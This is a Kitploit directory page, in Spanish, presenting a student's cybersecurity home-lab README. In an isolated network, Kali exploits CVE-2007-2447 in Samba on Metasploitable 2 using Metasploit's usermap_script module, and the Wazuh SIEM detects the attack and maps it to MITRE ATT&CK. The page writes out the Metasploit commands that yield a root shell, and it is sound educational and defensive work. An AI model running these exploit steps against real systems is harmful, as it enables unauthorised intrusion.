Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2007-2447-Exploitation-SIEM-Detection-Lab — Laboratorio de ataque AD/Linux aislado: explotó CVE-2007-2447 mediante Metasploit, detectado con Wazuh SIEM mapeado a MITRE ATT&CK (T1190, T1059) | Kitploit
Herramientas/GitHubGitHub/harshiys/cve-2007-2447-exploitation-siem-detection-lab
ReconocimientoFrameworks de ExploitsAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónInteligencia de AmenazasDetección de IntrusionesAprendizaje y EducaciónAnálisis de Registros

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Labs y Práctica
GitHubharshiys/cve-2007-2447-exploitation-siem-detection-lab

CVE-2007-2447-Exploitation-SIEM-Detection-Lab

Laboratorio de ataque AD/Linux aislado: explotó CVE-2007-2447 mediante Metasploit, detectado con Wazuh SIEM mapeado a MITRE ATT&CK (T1190, T1059)

Ver Repositorio
hace 4 díasAún no revisado
Compartir

🛡️ Laboratorio de Explotación de CVE-2007-2447 y Detección con SIEM (Wazuh + MITRE ATT&CK)

Proyecto B.Tech (BTP) | IIIT Pune Basado en: "Designing and Implementing an Effective Cybersecurity Home Lab for Detection and Monitoring" — ICCCNT 2023, IIT Delhi

Un laboratorio doméstico de ciberseguridad totalmente funcional construido en una sola máquina con herramientas gratuitas y de código abierto. El laboratorio simula un ciclo de vida de ataque real — Reconocimiento → Explotación → Detección — y demuestra cómo un SIEM puede detectar y mapear ataques al framework MITRE ATT&CK en tiempo real.


📐 Arquitectura del laboratorio

root@kitploit:~
┌─────────────────────────────────────────────────┐
│           VirtualBox — Internal Network          │
│              (cyberlab, 10.0.0.x/24)             │
│                                                  │
│  ┌──────────┐   ┌──────────────┐   ┌──────────┐ │
│  │  Kali    │   │ Metasploitable│  │  Ubuntu  │ │
│  │ 10.0.0.1 │◄─►│   10.0.0.2   │◄─►│ 10.0.0.3 │ │
│  │ ATTACKER │   │    VICTIM     │  │   SIEM   │ │
│  └──────────┘   └──────────────┘   └──────────┘ │
└─────────────────────────────────────────────────┘
         Host-Only Adapter (192.168.56.103)
         → Wazuh Dashboard access from browser

🧰 Herramientas y tecnologías


🔧 Guía de configuración

Requisitos previos

  • Una máquina con al menos 16 GB de RAM (las 3 VMs se ejecutan simultáneamente)
  • VirtualBox 7.x instalado
  • ~50 GB de espacio libre en disco

Paso 1 — Configuración de red en VirtualBox

Crea una Red Interna llamada cyberlab en VirtualBox. Las tres VMs reciben este adaptador. La VM Ubuntu/Wazuh recibe un Adaptador Solo-Anfitrión adicional para que puedas acceder al dashboard desde tu navegador.


Paso 2 — Kali Linux (Atacante)

  1. Descarga la imagen de VirtualBox de Kali Linux
  2. Impórtala y asigna el adaptador de red interna cyberlab
  3. Configura una IP estática:
root@kitploit:~
# Edit /etc/network/interfaces
auto eth0
iface eth0 inet static
    address 10.0.0.1
    netmask 255.255.255.0
  1. Reinicia la red: sudo systemctl restart networking

Paso 3 — Metasploitable 2 (Víctima)

  1. Descarga Metasploitable 2
  2. Impórtalo en VirtualBox y asigna la red cyberlab
  3. Configura una IP estática:
root@kitploit:~
# Edit /etc/network/interfaces
auto eth0
iface eth0 inet static
    address 10.0.0.2
    netmask 255.255.255.0

⚠️ Nunca expongas Metasploitable 2 a internet. Es inseguro a propósito.


Paso 4 — Ubuntu + SIEM Wazuh (Defensor)

  1. Instala Ubuntu Server 22.04
  2. Asigna dos adaptadores: interno cyberlab + Solo-Anfitrión
  3. Configura la IP estática mediante netplan (/etc/netplan/01-network-manager-all.yaml):
root@kitploit:~
network:
  version: 2
  renderer: NetworkManager
  ethernets:
    enp0s3:
      addresses:
        - 10.0.0.3/24
    enp0s8:
      dhcp4: true
  1. Instala Wazuh (nodo único):
root@kitploit:~
curl -sO https://packages.wazuh.com/4.7/wazuh-install.sh
sudo bash wazuh-install.sh -a
  1. Accede al dashboard en: https://192.168.56.103 (desde el navegador del host)

Paso 5 — Conectar Metasploitable a Wazuh mediante Syslog

Dado que Metasploitable 2 no puede ejecutar un agente de Wazuh, configura el reenvío de syslog para un monitoreo sin agente:

En Metasploitable, añade a /etc/rsyslog.conf:

root@kitploit:~
*.* @10.0.0.3:514

En Wazuh (Ubuntu), habilita la entrada de syslog en /var/ossec/etc/ossec.conf:

root@kitploit:~
<remote>
  <connection>syslog</connection>
  <port>514</port>
  <protocol>udp</protocol>
</remote>

Reinicia Wazuh: sudo systemctl restart wazuh-manager


⚔️ Simulación de ataque

Fase 1 — Reconocimiento (Nmap)

root@kitploit:~
# From Kali
nmap -sV -O 10.0.0.2

Servicios clave descubiertos en Metasploitable 2:

Se descubrieron más de 20 puertos abiertos. Huella del SO identificada: Linux 2.6.x


Fase 2 — Explotación (Metasploit)

Vulnerabilidad: CVE-2007-2447 — Inyección de comandos usermap_script de Samba

Permite la ejecución remota de código sin autenticación mediante solicitudes MS-RPC malformadas en Samba 3.0.0–3.0.25rc3.

root@kitploit:~
# From Kali — launch Metasploit
msfconsole

# Inside Metasploit
use exploit/multi/samba/usermap_script
set RHOSTS 10.0.0.2
set LHOST 10.0.0.1
run

# Verify root access
whoami
# Output: root

Fase 3 — Detección (SIEM Wazuh)

Después de la explotación, Wazuh detectó automáticamente los eventos y los mapeó a MITRE ATT&CK:

Total de eventos detectados: 55+

Accede al dashboard en https://192.168.56.103 → Eventos de Seguridad → MITRE ATT&CK


📊 Resultados clave

  • ✅ Se replicó con éxito el ciclo de vida completo del ataque en un entorno aislado
  • ✅ CVE-2007-2447 logró una shell root sin autenticación en segundos
  • ✅ El SIEM Wazuh detectó y mapeó todos los ataques a MITRE ATT&CK en tiempo real
  • ✅ El reenvío de syslog permitió el monitoreo sin agente del sistema heredado Metasploitable
  • ✅ Todo el laboratorio se ejecuta en una sola máquina host con 16 GB de RAM

📁 Estructura del repositorio

root@kitploit:~
cybersecurity-home-lab/
│
├── README.md                  ← You are here
├── network-config/
│   ├── kali-interfaces.txt    ← Kali static IP config
│   ├── metasploitable-interfaces.txt
│   └── ubuntu-netplan.yaml    ← Ubuntu/SIEM netplan config
├── wazuh-config/
│   └── ossec.conf             ← Wazuh syslog/agent config
├── screenshots/
│   ├── nmap-scan.png
│   ├── metasploit-exploit.png
│   ├── wazuh-dashboard.png
│   └── wazuh-alerts-table.png
└── report/
    └── ICCCNT_2023_paper.pdf  ← Reference research paper

🔗 Referencia

Dadiyala, C. et al. (2023). Designing and Implementing an Effective Cybersecurity Home Lab for Detection and Monitoring. 14th International Conference on Computing, Communication and Networking Technologies (ICCCNT), IIT Delhi. IEEE-56998.


⚠️ Descargo de responsabilidad

Este laboratorio está construido íntegramente con máquinas virtuales aisladas, sin acceso a internet durante las simulaciones de ataque. Todas las herramientas y técnicas se utilizan estrictamente con fines educativos dentro de un entorno controlado. No intentes replicar ninguna técnica de ataque en sistemas que no sean de tu propiedad o para los que no tengas permiso explícito de pruebas.


Presentado por Harshita Verma | IIIT Pune

Descargar herramienta
VMRolIPHerramientas
Kali Linux 2026.1Atacante10.0.0.1Nmap, Metasploit
Metasploitable 2Víctima10.0.0.220+ vulnerabilidades
Ubuntu 22.04 + WazuhSIEM10.0.0.3Wazuh v4.7.5
HerramientaVersiónPropósito
VirtualBox7.xHipervisor — ejecuta todas las VMs en un solo host
Kali Linux2026.1SO de pruebas de penetración (ofensivo)
Metasploitable 2v2.0Objetivo deliberadamente vulnerable
Wazuhv4.7.5SIEM de código abierto (defensivo)
NmapÚltimaEscaneo de red/puertos
Metasploit FrameworkÚltimaFramework de explotación
PuertoServicioVersión
21/tcpFTPvsftpd 2.3.4
22/tcpSSHOpenSSH 4.7p1
80/tcpHTTPApache 2.2.8
139/445SMBSamba 3.x–4.x
3306/tcpMySQL5.0.51a
5432/tcpPostgreSQL8.3
ID de ReglaDescripciónTécnica MITRETáctica
5402Ejecución exitosa de sudo a ROOTT1548.003Escalada de Privilegios
5501PAM: Sesión de inicio abiertaT1078Acceso Inicial / Persistencia
5502PAM: Sesión de inicio cerradaT1078Evasión de Defensas
502Servidor Wazuh iniciado—Detección Activa